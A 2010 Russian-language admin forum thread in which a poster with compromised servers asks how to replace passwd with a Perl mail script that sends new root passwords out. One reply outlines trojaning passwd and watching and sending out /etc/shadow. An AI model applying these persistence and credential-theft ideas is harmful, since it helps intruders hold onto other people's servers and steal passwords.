URL: https://www.opennet.ru/cgi-bin/openforum/vsluhboard.cgi
Форум: vsluhforumID9
Нить номер: 8893
[ Назад ]

Исходное сообщение
"свой скрипт вместо passwd "
Отправлено andragen , 13-Окт-10 17:01

дано
linux/freebsd дедик сервера хакнутые.
Хочу чтоб когда меняется пароль рута, на мыло приходило письмо с новым паролем.
Пришла идея подменить команду passwd на скрипт в котором меняется сперва пароль а потом высылается на почту.
По есть следующее perl скрипт.
   use Net::SMTP;
   $smtp = Net::SMTP->new('smtp.mail.ru');
   $smtp->mail($ENV{pupkin});
   $smtp->to('pupkin@mail.ru');
   $smtp->data();
   $smtp->datasend("To: postmaster\n");
   $smtp->datasend("\n");
   $smtp->datasend("A simple test message\n");
   $smtp->dataend();
   $smtp->quit;
Подскажите как подставить в систему этот скрипт и может что подправить надо
Спасибо.

Содержание

свой скрипт вместо passwd ,andragen, 17:13 , 13-Окт-10
свой скрипт вместо passwd ,Andrey Mitrofanov, 18:07 , 13-Окт-10
- свой скрипт вместо passwd ,testfreebsd, 23:16 , 13-Окт-10
  - свой скрипт вместо passwd ,cryo, 02:34 , 14-Окт-10
    - свой скрипт вместо passwd ,testfreebsd, 09:46 , 14-Окт-10
      - свой скрипт вместо passwd ,Xaionaro, 22:30 , 14-Окт-10

Сообщения в этом обсуждении

"свой скрипт вместо passwd "
Отправлено andragen , 13-Окт-10 17:13

Я имел ввиду если хакнут, ну то есть представим что взломали и поменяли пароль рута через команду passwd/
В итоге копия пароля ушло на почту.

"свой скрипт вместо passwd "
Отправлено Andrey Mitrofanov , 13-Окт-10 18:07

Во-первых, с чего вы взяли, что хацкер будет запускать /bin/passwd, а не изменит, как положено Настоящему Индейцу, файл /etc/shadow ?
Во-вторых, посмотрите в сторону PAM, если уж чешет и беспокоится.

"свой скрипт вместо passwd "
Отправлено testfreebsd , 13-Окт-10 23:16

> Во-первых, с чего вы взяли, что хацкер будет запускать /bin/passwd, а не
> изменит, как положено Настоящему Индейцу, файл /etc/shadow ?
> Во-вторых, посмотрите в сторону PAM, если уж чешет и беспокоится.
Проблема не в том как бы защититься а как не потерять контроль к уже замененному паролю рута, не буду объяснять детали в общем зада такая у кого какие идеи будут.

"свой скрипт вместо passwd "
Отправлено cryo , 14-Окт-10 02:34

>> Во-первых, с чего вы взяли, что хацкер будет запускать /bin/passwd, а не
>> изменит, как положено Настоящему Индейцу, файл /etc/shadow ?
>> Во-вторых, посмотрите в сторону PAM, если уж чешет и беспокоится.
> Проблема не в том как бы защититься а как не потерять контроль
> к уже замененному паролю рута, не буду объяснять детали в общем
> зада такая у кого какие идеи будут.
Ты не туда ломишься, дядя. Тебе на кулхацкерские форумы. Там же и на смех поднимут - кулхацкер, а не умеет скрипты из 5 строк писать :)

"свой скрипт вместо passwd "
Отправлено testfreebsd , 14-Окт-10 09:46

уже есть но там народ гарит это не возможно :)

"свой скрипт вместо passwd "
Отправлено Xaionaro , 14-Окт-10 22:30

> уже есть но там народ гарит это не возможно :)
Если пароль будет меняться только через passwd, то я не вижу проблемы тупо подменить утилиту /usr/bin/passwd (ну или изменить пути, так чтобы произошла подмена команды passwd, либо запихать подмену в /bin, либо вообще использовать alias). Однако какая бы операция ни были сделана, её всегда можно обратить. А вообще в качестве других вариантов, можно с помощью incrontab следить за изменением shadow и отсылать новую версию куда-нибудь (и надеиться, что сможешь крякнуть, если это будет актуально). Или можно сделать chattr +i /etc/shadow /etc/passwd - если имеете дело с ламером, он не догадается как это обойти.
А если говорить ещё более обще, то если вы работаете с чужим сервером и не хотите терять контроль - то вы либо сволочь, которых расстреливать надо, либо смиритесь с тем, что сервер чужой.